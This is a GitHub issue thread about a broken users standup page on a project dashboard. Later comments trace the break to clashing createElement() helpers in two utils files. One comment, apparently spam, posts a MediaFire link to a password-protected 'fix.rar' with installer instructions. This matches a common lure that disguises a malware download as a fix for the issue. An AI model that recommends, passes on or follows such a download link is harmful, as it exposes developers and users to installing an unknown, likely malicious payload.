### ISSUE TITLE
Fix users standup page

### ISSUE THREAD

**Issue by vinit717** [Real-Dev-Squad/website-dashboard#794]
### Screenshots
![image](https://github.com/user-attachments/assets/5f03fa8e-3d1a-49d5-8f1f-7e7633b3d8ac)

### Reproducibility

 - [ ] This issue is reproducible
 - [ ] This issue is not reproducible

### Steps to Reproduce
1. 
2. 

### Severity/Priority
 - [ ] Critical
 - [ ] High
 - [ ] Medium
 - [ ] Low

### Checklist

- [ ] I have read and followed the project's code of conduct.
- [ ] I have searched for similar issues before creating this one.
- [ ] I have provided all the necessary information to understand and reproduce the issue.
- [ ] I am willing to contribute to the resolution of this issue.

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by vinit717** [comment]
> is this mostly about image alignment in table? @vinit717

Are you on RDS? then ping me there

**Comment by Mir-SA** [comment]
this change is coming from base/utils.js which was added ~2weeks ago in #768 
so there is a conflict between base/utils.js createElement() and standup/utils.js createElement()
there could be more such conflicts since base/utils.js was added to multiple pages

**Comment by Mir-SA** [comment]
i've been looking at it for a while now only one in standup seems to be breaking change otherwise there is some repeated code in base/utils and local-utils for pages
